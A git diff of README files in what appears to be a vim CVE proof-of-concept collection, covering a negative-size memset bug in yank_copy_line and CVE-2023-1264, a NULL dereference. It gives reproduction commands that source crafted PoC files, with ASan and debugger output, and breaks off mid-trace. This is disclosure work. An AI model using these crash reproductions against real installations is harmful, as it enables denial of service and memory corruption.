-```bash
-./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_nsp01_s.dat -c :qa!
-=================================================================
-==1962298==ERROR: AddressSanitizer: negative-size-param: (size=-1)
- #0 0x7ffff75eafdd in __interceptor_memset ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:762
- #1 0x5555562c58ad in yank_copy_line /home/fuzz/vim/src/register.c:1468
- #2 0x5555562c35bd in op_yank /home/fuzz/vim/src/register.c:1290
- #3 0x555555f96baf in op_delete /home/fuzz/vim/src/ops.c:742
- #4 0x555555fa95b9 in op_change /home/fuzz/vim/src/ops.c:1754
- #5 0x555555fd2498 in do_pending_operator /home/fuzz/vim/src/ops.c:4123
- #6 0x555555f29d64 in normal_cmd /home/fuzz/vim/src/normal.c:960
- #7 0x555555b1bb27 in exec_normal /home/fuzz/vim/src/ex_docmd.c:8887
- #8 0x555555b1b4bc in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8850
- #9 0x555555b1a404 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8768
- #10 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580
- #11 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993
- #12 0x55555633c1ab in do_source_ext /home/fuzz/vim/src/scriptfile.c:1759
- #13 0x55555633e9aa in do_source /home/fuzz/vim/src/scriptfile.c:1905
- #14 0x5555563370a2 in cmd_source /home/fuzz/vim/src/scriptfile.c:1250
- #15 0x5555563371fb in ex_source /home/fuzz/vim/src/scriptfile.c:1276
- #16 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580
- #17 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993
- #18 0x555555aa25cd in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:587
- #19 0x555556adfa19 in exe_commands /home/fuzz/vim/src/main.c:3146
- #20 0x555556ac9ab9 in vim_main2 
/home/fuzz/vim/src/main.c:782 - #21 0x555556ac6f8f in main /home/fuzz/vim/src/main.c:433 - #22 0x7ffff71f9082 in __libc_start_main ../csu/libc-start.c:308 - #23 0x55555569724d in _start (/home/fuzz/vim/src/vim+0x14324d) - -0x602000007270 is located 0 bytes inside of 2-byte region [0x602000007270,0x602000007272) -allocated by thread T0 here: - #0 0x7ffff7690808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 - #1 0x555555697ed6 in lalloc /home/fuzz/vim/src/alloc.c:246 - #2 0x55555569767e in alloc /home/fuzz/vim/src/alloc.c:151 - #3 0x5555562c5715 in yank_copy_line /home/fuzz/vim/src/register.c:1464 - #4 0x5555562c35bd in op_yank /home/fuzz/vim/src/register.c:1290 - #5 0x555555f96baf in op_delete /home/fuzz/vim/src/ops.c:742 - #6 0x555555fa95b9 in op_change /home/fuzz/vim/src/ops.c:1754 - #7 0x555555fd2498 in do_pending_operator /home/fuzz/vim/src/ops.c:4123 - #8 0x555555f29d64 in normal_cmd /home/fuzz/vim/src/normal.c:960 - #9 0x555555b1bb27 in exec_normal /home/fuzz/vim/src/ex_docmd.c:8887 - #10 0x555555b1b4bc in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8850 - #11 0x555555b1a404 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8768 - #12 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580 - #13 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993 - #14 0x55555633c1ab in do_source_ext /home/fuzz/vim/src/scriptfile.c:1759 - #15 0x55555633e9aa in do_source /home/fuzz/vim/src/scriptfile.c:1905 - #16 0x5555563370a2 in cmd_source /home/fuzz/vim/src/scriptfile.c:1250 - #17 0x5555563371fb in ex_source /home/fuzz/vim/src/scriptfile.c:1276 - #18 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580 - #19 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993 - #20 0x555555aa25cd in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:587 - #21 0x555556adfa19 in exe_commands /home/fuzz/vim/src/main.c:3146 - #22 0x555556ac9ab9 in vim_main2 /home/fuzz/vim/src/main.c:782 - #23 0x555556ac6f8f in main 
/home/fuzz/vim/src/main.c:433 - #24 0x7ffff71f9082 in __libc_start_main ../csu/libc-start.c:308 - -SUMMARY: AddressSanitizer: negative-size-param ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:762 in __interceptor_memset -==1962298==ABORTING -``` -[poc_nsp01_s.dat](poc_nsp01_s.dat) -## GDB -```bash -gdb --args ./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_nsp01_s.dat -c :qa! - -─── Output/messages ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -[Thread debugging using libthread_db enabled] -Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". - -Breakpoint 1, yank_copy_line (bd=0x7fffffffbc20, y_idx=0, exclude_trailing_space=0) at register.c:1468 -1468 vim_memset(pnew, ' ', (size_t)bd->startspaces); -─── Assembly ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── - 0x00005555562c5854 yank_copy_line+883 je 0x5555562c585e - 0x00005555562c5856 yank_copy_line+885 mov %rdx,%rdi - 0x00005555562c5859 yank_copy_line+888 callq 0x555555696b30 <__asan_report_store8@plt> - 0x00005555562c585e yank_copy_line+893 mov -0x18(%rbp),%rdx - 0x00005555562c5862 yank_copy_line+897 mov %rdx,(%rax) -!0x00005555562c5865 yank_copy_line+900 mov -0x28(%rbp),%rax - 0x00005555562c5869 yank_copy_line+904 mov %rax,%rdx - 0x00005555562c586c yank_copy_line+907 mov %rdx,%rax - 0x00005555562c586f yank_copy_line+910 shr $0x3,%rax - 0x00005555562c5873 yank_copy_line+914 add $0x7fff8000,%rax -─── Breakpoints ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -[1] break at 
0x00005555562c5865 in register.c:1468 for /home/fuzz/vim/src/register.c:1468 hit 1 time -─── Expressions ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -─── History ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -─── Memory ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -─── Registers ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── - rax 0x0000602000007230 rbx 0x0000555556d935e0 rcx 0x0000000000000000 rdx 0x0000602000007250 rsi 0x0000000000000000 rdi 0x0000000000000000 rbp 0x00007fffffffbb00 rsp 0x00007fffffffbac0 - r8 0x00007ffff7fb8000 r9 0x0000000000000002 r10 0x0000602000007240 r11 0x00000000000000e0 r12 0x00007fffffffbd30 r13 0x00000ffffffff772 r14 0x00007fffffffbb90 r15 0x0000555556d86b60 - rip 0x00005555562c5865 eflags [ PF ZF IF ] cs 0x00000033 ss 0x0000002b ds 0x00000000 es 0x00000000 fs 0x00000000 gs 0x00000000 -─── Source ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── - 1463 bd->endspaces = 0; - 1464 if ((pnew = alloc(bd->startspaces + bd->endspaces + bd->textlen + 1)) - 1465 == NULL) - 1466 return FAIL; - 1467 y_current->y_array[y_idx] = pnew; -!1468 vim_memset(pnew, ' ', (size_t)bd->startspaces); - 1469 pnew += bd->startspaces; - 1470 
mch_memmove(pnew, bd->textstart, (size_t)bd->textlen); - 1471 pnew += bd->textlen; - 1472 vim_memset(pnew, ' ', (size_t)bd->endspaces); -─── Stack ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -[0] from 0x00005555562c5865 in yank_copy_line+900 at register.c:1468 -[1] from 0x00005555562c35be in op_yank+11347 at register.c:1290 -[2] from 0x0000555555f96bb0 in op_delete+8257 at ops.c:742 -[3] from 0x0000555555fa95ba in op_change+1153 at ops.c:1754 -[4] from 0x0000555555fd2499 in do_pending_operator+44344 at ops.c:4123 -[5] from 0x0000555555f29d65 in normal_cmd+21183 at normal.c:960 -[6] from 0x0000555555b1bb28 in exec_normal+1640 at ex_docmd.c:8887 -[7] from 0x0000555555b1b4bd in exec_normal_cmd+73 at ex_docmd.c:8850 -[8] from 0x0000555555b1a405 in ex_normal+5241 at ex_docmd.c:8768 -[9] from 0x0000555555abe321 in do_one_cmd+59341 at ex_docmd.c:2580 -[+] -─── Threads ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -[1] id 1972438 name vim from 0x00005555562c5865 in yank_copy_line+900 at register.c:1468 -─── Variables ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -arg bd = 0x7fffffffbc20: {startspaces = -1,endspaces = 2,textlen = 0,textstart = 0x621000009cff "",t…, y_idx = 0, exclude_trailing_space = 0 -loc pnew = 0x602000007250 "\276\276": 190 '\276' -─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── ->>> p 
bd->startspaces -$2 = -1 ->>> -``` -## Impact -This vulnerability is capable of crashing software, modify memory, and possible remote execution. +## Description +Incorrect Calculation of Buffer Size in function yank_copy_line at register.c:1468 +## vim version +```bash +git log +commit 657aea7fc47fb919ce76fad64ba0ec55a1af80f1 (HEAD -> master, tag: v9.0.1249, origin/master, origin/HEAD) +``` +## POC +```bash +./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_nsp01_s.dat -c :qa! +================================================================= +==1962298==ERROR: AddressSanitizer: negative-size-param: (size=-1) + #0 0x7ffff75eafdd in __interceptor_memset ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:762 + #1 0x5555562c58ad in yank_copy_line /home/fuzz/vim/src/register.c:1468 + #2 0x5555562c35bd in op_yank /home/fuzz/vim/src/register.c:1290 + #3 0x555555f96baf in op_delete /home/fuzz/vim/src/ops.c:742 + #4 0x555555fa95b9 in op_change /home/fuzz/vim/src/ops.c:1754 + #5 0x555555fd2498 in do_pending_operator /home/fuzz/vim/src/ops.c:4123 + #6 0x555555f29d64 in normal_cmd /home/fuzz/vim/src/normal.c:960 + #7 0x555555b1bb27 in exec_normal /home/fuzz/vim/src/ex_docmd.c:8887 + #8 0x555555b1b4bc in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8850 + #9 0x555555b1a404 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8768 + #10 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580 + #11 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993 + #12 0x55555633c1ab in do_source_ext /home/fuzz/vim/src/scriptfile.c:1759 + #13 0x55555633e9aa in do_source /home/fuzz/vim/src/scriptfile.c:1905 + #14 0x5555563370a2 in cmd_source /home/fuzz/vim/src/scriptfile.c:1250 + #15 0x5555563371fb in ex_source /home/fuzz/vim/src/scriptfile.c:1276 + #16 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580 + #17 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993 + #18 0x555555aa25cd in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:587 
+ #19 0x555556adfa19 in exe_commands /home/fuzz/vim/src/main.c:3146 + #20 0x555556ac9ab9 in vim_main2 /home/fuzz/vim/src/main.c:782 + #21 0x555556ac6f8f in main /home/fuzz/vim/src/main.c:433 + #22 0x7ffff71f9082 in __libc_start_main ../csu/libc-start.c:308 + #23 0x55555569724d in _start (/home/fuzz/vim/src/vim+0x14324d) + +0x602000007270 is located 0 bytes inside of 2-byte region [0x602000007270,0x602000007272) +allocated by thread T0 here: + #0 0x7ffff7690808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 + #1 0x555555697ed6 in lalloc /home/fuzz/vim/src/alloc.c:246 + #2 0x55555569767e in alloc /home/fuzz/vim/src/alloc.c:151 + #3 0x5555562c5715 in yank_copy_line /home/fuzz/vim/src/register.c:1464 + #4 0x5555562c35bd in op_yank /home/fuzz/vim/src/register.c:1290 + #5 0x555555f96baf in op_delete /home/fuzz/vim/src/ops.c:742 + #6 0x555555fa95b9 in op_change /home/fuzz/vim/src/ops.c:1754 + #7 0x555555fd2498 in do_pending_operator /home/fuzz/vim/src/ops.c:4123 + #8 0x555555f29d64 in normal_cmd /home/fuzz/vim/src/normal.c:960 + #9 0x555555b1bb27 in exec_normal /home/fuzz/vim/src/ex_docmd.c:8887 + #10 0x555555b1b4bc in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8850 + #11 0x555555b1a404 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8768 + #12 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580 + #13 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993 + #14 0x55555633c1ab in do_source_ext /home/fuzz/vim/src/scriptfile.c:1759 + #15 0x55555633e9aa in do_source /home/fuzz/vim/src/scriptfile.c:1905 + #16 0x5555563370a2 in cmd_source /home/fuzz/vim/src/scriptfile.c:1250 + #17 0x5555563371fb in ex_source /home/fuzz/vim/src/scriptfile.c:1276 + #18 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580 + #19 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993 + #20 0x555555aa25cd in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:587 + #21 0x555556adfa19 in exe_commands /home/fuzz/vim/src/main.c:3146 + #22 
0x555556ac9ab9 in vim_main2 /home/fuzz/vim/src/main.c:782 + #23 0x555556ac6f8f in main /home/fuzz/vim/src/main.c:433 + #24 0x7ffff71f9082 in __libc_start_main ../csu/libc-start.c:308 + +SUMMARY: AddressSanitizer: negative-size-param ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:762 in __interceptor_memset +==1962298==ABORTING +``` +[poc_nsp01_s.dat](poc_nsp01_s.dat) +## GDB +```bash +gdb --args ./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_nsp01_s.dat -c :qa! + +─── Output/messages ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +[Thread debugging using libthread_db enabled] +Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". + +Breakpoint 1, yank_copy_line (bd=0x7fffffffbc20, y_idx=0, exclude_trailing_space=0) at register.c:1468 +1468 vim_memset(pnew, ' ', (size_t)bd->startspaces); +─── Assembly ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── + 0x00005555562c5854 yank_copy_line+883 je 0x5555562c585e + 0x00005555562c5856 yank_copy_line+885 mov %rdx,%rdi + 0x00005555562c5859 yank_copy_line+888 callq 0x555555696b30 <__asan_report_store8@plt> + 0x00005555562c585e yank_copy_line+893 mov -0x18(%rbp),%rdx + 0x00005555562c5862 yank_copy_line+897 mov %rdx,(%rax) +!0x00005555562c5865 yank_copy_line+900 mov -0x28(%rbp),%rax + 0x00005555562c5869 yank_copy_line+904 mov %rax,%rdx + 0x00005555562c586c yank_copy_line+907 mov %rdx,%rax + 0x00005555562c586f yank_copy_line+910 shr $0x3,%rax + 0x00005555562c5873 yank_copy_line+914 add $0x7fff8000,%rax +─── Breakpoints 
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +[1] break at 0x00005555562c5865 in register.c:1468 for /home/fuzz/vim/src/register.c:1468 hit 1 time +─── Expressions ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +─── History ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +─── Memory ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +─── Registers ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── + rax 0x0000602000007230 rbx 0x0000555556d935e0 rcx 0x0000000000000000 rdx 0x0000602000007250 rsi 0x0000000000000000 rdi 0x0000000000000000 rbp 0x00007fffffffbb00 rsp 0x00007fffffffbac0 + r8 0x00007ffff7fb8000 r9 0x0000000000000002 r10 0x0000602000007240 r11 0x00000000000000e0 r12 0x00007fffffffbd30 r13 0x00000ffffffff772 r14 0x00007fffffffbb90 r15 0x0000555556d86b60 + rip 0x00005555562c5865 eflags [ PF ZF IF ] cs 0x00000033 ss 0x0000002b ds 0x00000000 es 0x00000000 fs 0x00000000 gs 0x00000000 +─── Source ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── + 1463 bd->endspaces = 0; + 1464 if ((pnew = 
alloc(bd->startspaces + bd->endspaces + bd->textlen + 1)) + 1465 == NULL) + 1466 return FAIL; + 1467 y_current->y_array[y_idx] = pnew; +!1468 vim_memset(pnew, ' ', (size_t)bd->startspaces); + 1469 pnew += bd->startspaces; + 1470 mch_memmove(pnew, bd->textstart, (size_t)bd->textlen); + 1471 pnew += bd->textlen; + 1472 vim_memset(pnew, ' ', (size_t)bd->endspaces); +─── Stack ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +[0] from 0x00005555562c5865 in yank_copy_line+900 at register.c:1468 +[1] from 0x00005555562c35be in op_yank+11347 at register.c:1290 +[2] from 0x0000555555f96bb0 in op_delete+8257 at ops.c:742 +[3] from 0x0000555555fa95ba in op_change+1153 at ops.c:1754 +[4] from 0x0000555555fd2499 in do_pending_operator+44344 at ops.c:4123 +[5] from 0x0000555555f29d65 in normal_cmd+21183 at normal.c:960 +[6] from 0x0000555555b1bb28 in exec_normal+1640 at ex_docmd.c:8887 +[7] from 0x0000555555b1b4bd in exec_normal_cmd+73 at ex_docmd.c:8850 +[8] from 0x0000555555b1a405 in ex_normal+5241 at ex_docmd.c:8768 +[9] from 0x0000555555abe321 in do_one_cmd+59341 at ex_docmd.c:2580 +[+] +─── Threads ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +[1] id 1972438 name vim from 0x00005555562c5865 in yank_copy_line+900 at register.c:1468 +─── Variables ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +arg bd = 0x7fffffffbc20: {startspaces = -1,endspaces = 2,textlen = 0,textstart = 0x621000009cff "",t…, y_idx = 0, exclude_trailing_space = 0 +loc pnew = 0x602000007250 "\276\276": 190 '\276' 
+──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+>>> p bd->startspaces
+$2 = -1
+>>>
+```
+## Impact
+This vulnerability is capable of crashing software, modify memory, and possible remote execution.
diff --git a/cve/vim/2023/CVE-2023-1264/README.md b/cve/vim/2023/CVE-2023-1264/README.md
index df7b85a6..418a9873 100644
--- a/cve/vim/2023/CVE-2023-1264/README.md
+++ b/cve/vim/2023/CVE-2023-1264/README.md
@@ -1,108 +1,108 @@
-# CVE-2023-1264
-
-NULL Pointer Dereference in function utfc_ptr2len at mbyte.c.c:2145 allows attackers to cause a denial of service (application crash) via a crafted input.
-
-## vim version
-
-```
-commit 0caaf1e46511f7a92e036f05e6aa9d5992540117 (HEAD -> master, tag: v9.0.1293, origin/master, origin/HEAD)
-Author: Yegappan Lakshmanan
-Date: Thu Feb 9 12:23:17 2023 +0000
-
- patch 9.0.1293: the set_num_option() is too long
-
- Problem: The set_num_option() is too long.
- Solution: Move code to separate functions. (Yegappan Lakshmanan,
- closes #11954)
-```
-
-## Proof of Concept
-
-```
-➜ src git:(master) ./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc.dat -c :qa!
-[1] 29650 segmentation fault ./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc.dat -c :qa!
-```
-
-## Debug info
-
-```
-pwndbg> r -u NONE -i NONE -n -m -X -Z -e -s -S ../../poc -c :qa!
-Starting program: /root/test/vim/src/vim -u NONE -i NONE -n -m -X -Z -e -s -S ../../poc -c :qa!
-[Thread debugging using libthread_db enabled]
-Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
-
-Program received signal SIGSEGV, Segmentation fault.
-0x0000555555699519 in utfc_ptr2len (p=0x0) at mbyte.c:2145 -2145 int b0 = *p; -LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA -──────────────────────────────────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────────────────────────────────────────────────────────────────────────────────── - RAX 0x0 -*RBX 0x55555595ad70 ◂— 0x5 - RCX 0x0 - RDX 0x0 - RDI 0x0 -*RSI 0x1 -*R8 0x20f5d46a556c2 -*R9 0x7fffffffb314 ◂— 0x5587847b00007fff -*R10 0x7fffffffb340 ◂— 0x63e4e959 - R11 0x0 -*R12 0x7fffffffe3f8 —▸ 0x7fffffffe6ea ◂— '/root/test/vim/src/vim' -*R13 0x5555558878e6 (main) ◂— endbr64 -*R14 0x555555902038 (__do_global_dtors_aux_fini_array_entry) —▸ 0x55555558aac0 (__do_global_dtors_aux) ◂— endbr64 -*R15 0x7ffff7ffd040 (_rtld_global) —▸ 0x7ffff7ffe2e0 —▸ 0x555555554000 ◂— 0x10102464c457f -*RBP 0x7fffffffb470 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 —▸ 0x7fffffffb5c0 ◂— ... -*RSP 0x7fffffffb450 —▸ 0x7fffffffb460 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 ◂— ... 
-*RIP 0x555555699519 (utfc_ptr2len+20) ◂— movzx eax, byte ptr [rax] -───────────────────────────────────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────────────────────────────────────────────────────────────── - ► 0x555555699519 movzx eax, byte ptr [rax] - 0x55555569951c movzx eax, al - 0x55555569951f mov dword ptr [rbp - 4], eax - 0x555555699522 cmp dword ptr [rbp - 4], 0 - 0x555555699526 jne utfc_ptr2len+45 - ↓ - 0x555555699532 cmp dword ptr [rbp - 4], 0x7f - 0x555555699536 jg utfc_ptr2len+76 - ↓ - 0x555555699551 mov rax, qword ptr [rbp - 0x18] - 0x555555699555 mov rdi, rax - 0x555555699558 call utf_ptr2len - - 0x55555569955d mov dword ptr [rbp - 0xc], eax -─────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]───────────────────────────────────────────────────────────────────────────────────────────────────────────────── -In file: /root/test/vim/src/mbyte.c - 2140 */ - 2141 int - 2142 utfc_ptr2len(char_u *p) - 2143 { - 2144 int len; - ► 2145 int b0 = *p; - 2146 #ifdef FEAT_ARABIC - 2147 int prevlen; - 2148 #endif - 2149 - 2150 if (b0 == NUL) -─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -00:0000│ rsp 0x7fffffffb450 —▸ 0x7fffffffb460 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 ◂— ... -01:0008│ 0x7fffffffb458 ◂— 0x0 -02:0010│ 0x7fffffffb460 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 —▸ 0x7fffffffb5c0 ◂— ... -03:0018│ 0x7fffffffb468 —▸ 0x555555638c90 (putcmdline+100) ◂— mov eax, dword ptr [rbp - 4] -04:0020│ rbp 0x7fffffffb470 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 —▸ 0x7fffffffb5c0 ◂— ... 
-05:0028│ 0x7fffffffb478 —▸ 0x555555638d0c (unputcmdline+101) ◂— mov edx, eax -06:0030│ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 —▸ 0x7fffffffb5c0 —▸ 0x7fffffffb5f0 ◂— ... -07:0038│ 0x7fffffffb488 —▸ 0x55555565e74b (vgetorpeek+3187) ◂— jmp 0x55555565e752 -───────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────────────────────────────────────────────────────────────────────── - ► f 0 0x555555699519 utfc_ptr2len+20 - f 1 0x555555638d0c unputcmdline+101 - f 2 0x55555565e74b vgetorpeek+3187 - f 3 0x55555565b8a6 vgetc+250 - f 4 0x55555565bf9e safe_vgetc+17 - f 5 0x5555556aec0f get_number+126 - f 6 0x5555556aedd7 prompt_for_number+115 - f 7 0x55555578f2b8 spell_suggest+2101 -``` - -[PoC](https://raw.githubusercontent.com/khoanguyenxuan/testing/main/poc.dat) - -## Impact - +# CVE-2023-1264 + +NULL Pointer Dereference in function utfc_ptr2len at mbyte.c.c:2145 allows attackers to cause a denial of service (application crash) via a crafted input. + +## vim version + +``` +commit 0caaf1e46511f7a92e036f05e6aa9d5992540117 (HEAD -> master, tag: v9.0.1293, origin/master, origin/HEAD) +Author: Yegappan Lakshmanan +Date: Thu Feb 9 12:23:17 2023 +0000 + + patch 9.0.1293: the set_num_option() is too long + + Problem: The set_num_option() is too long. + Solution: Move code to separate functions. (Yegappan Lakshmanan, + closes #11954) +``` + +## Proof of Concept + +``` +➜ src git:(master) ./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc.dat -c :qa! +[1] 29650 segmentation fault ./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc.dat -c :qa! +``` + +## Debug info + +``` +pwndbg> r -u NONE -i NONE -n -m -X -Z -e -s -S ../../poc -c :qa! +Starting program: /root/test/vim/src/vim -u NONE -i NONE -n -m -X -Z -e -s -S ../../poc -c :qa! +[Thread debugging using libthread_db enabled] +Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". 
+ +Program received signal SIGSEGV, Segmentation fault. +0x0000555555699519 in utfc_ptr2len (p=0x0) at mbyte.c:2145 +2145 int b0 = *p; +LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA +──────────────────────────────────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────────────────────────────────────────────────────────────────────────────────── + RAX 0x0 +*RBX 0x55555595ad70 ◂— 0x5 + RCX 0x0 + RDX 0x0 + RDI 0x0 +*RSI 0x1 +*R8 0x20f5d46a556c2 +*R9 0x7fffffffb314 ◂— 0x5587847b00007fff +*R10 0x7fffffffb340 ◂— 0x63e4e959 + R11 0x0 +*R12 0x7fffffffe3f8 —▸ 0x7fffffffe6ea ◂— '/root/test/vim/src/vim' +*R13 0x5555558878e6 (main) ◂— endbr64 +*R14 0x555555902038 (__do_global_dtors_aux_fini_array_entry) —▸ 0x55555558aac0 (__do_global_dtors_aux) ◂— endbr64 +*R15 0x7ffff7ffd040 (_rtld_global) —▸ 0x7ffff7ffe2e0 —▸ 0x555555554000 ◂— 0x10102464c457f +*RBP 0x7fffffffb470 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 —▸ 0x7fffffffb5c0 ◂— ... +*RSP 0x7fffffffb450 —▸ 0x7fffffffb460 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 ◂— ... 
+*RIP 0x555555699519 (utfc_ptr2len+20) ◂— movzx eax, byte ptr [rax] +───────────────────────────────────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────────────────────────────────────────────────────────────── + ► 0x555555699519 movzx eax, byte ptr [rax] + 0x55555569951c movzx eax, al + 0x55555569951f mov dword ptr [rbp - 4], eax + 0x555555699522 cmp dword ptr [rbp - 4], 0 + 0x555555699526 jne utfc_ptr2len+45 + ↓ + 0x555555699532 cmp dword ptr [rbp - 4], 0x7f + 0x555555699536 jg utfc_ptr2len+76 + ↓ + 0x555555699551 mov rax, qword ptr [rbp - 0x18] + 0x555555699555 mov rdi, rax + 0x555555699558 call utf_ptr2len + + 0x55555569955d mov dword ptr [rbp - 0xc], eax +─────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]───────────────────────────────────────────────────────────────────────────────────────────────────────────────── +In file: /root/test/vim/src/mbyte.c + 2140 */ + 2141 int + 2142 utfc_ptr2len(char_u *p) + 2143 { + 2144 int len; + ► 2145 int b0 = *p; + 2146 #ifdef FEAT_ARABIC + 2147 int prevlen; + 2148 #endif + 2149 + 2150 if (b0 == NUL) +─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +00:0000│ rsp 0x7fffffffb450 —▸ 0x7fffffffb460 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 ◂— ... +01:0008│ 0x7fffffffb458 ◂— 0x0 +02:0010│ 0x7fffffffb460 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 —▸ 0x7fffffffb5c0 ◂— ... +03:0018│ 0x7fffffffb468 —▸ 0x555555638c90 (putcmdline+100) ◂— mov eax, dword ptr [rbp - 4] +04:0020│ rbp 0x7fffffffb470 —▸ 